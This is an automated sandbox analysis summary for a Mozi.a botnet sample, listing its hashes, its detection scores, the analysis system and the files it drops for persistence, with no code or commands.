
Mozi.a

Status: finished
Submission Time: 2020-06-16 22:30:29 +02:00
Malicious
Spreader
Trojan
Evader
Mirai

Details

  • Analysis ID:
    239067
  • API (Web) ID:
    374026
  • Analysis Started:
    2020-06-16 22:30:29 +02:00
  • Analysis Finished:
    2020-06-16 22:38:30 +02:00
  • MD5:
    9a111588a7db15b796421bd13a949cd4
  • SHA1:
    034c8c51a58be11ca620ce3eb0d43d5a59275d2f
  • SHA256:
    e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0
  • Technologies:
    Joe Sandbox

Detection: malicious
Score: 100
System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

  • malicious (Score: 41/60)
  • malicious (Score: 17/40)
  • malicious (Score: 18/31)
  • malicious

IPs


URLs


Dropped files

  • /etc/init.d/mountdevsubfs.sh
    ASCII text
  • /usr/networks
    ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
  • /etc/rcS.d/S95baby.sh
    POSIX shell script, ASCII text executable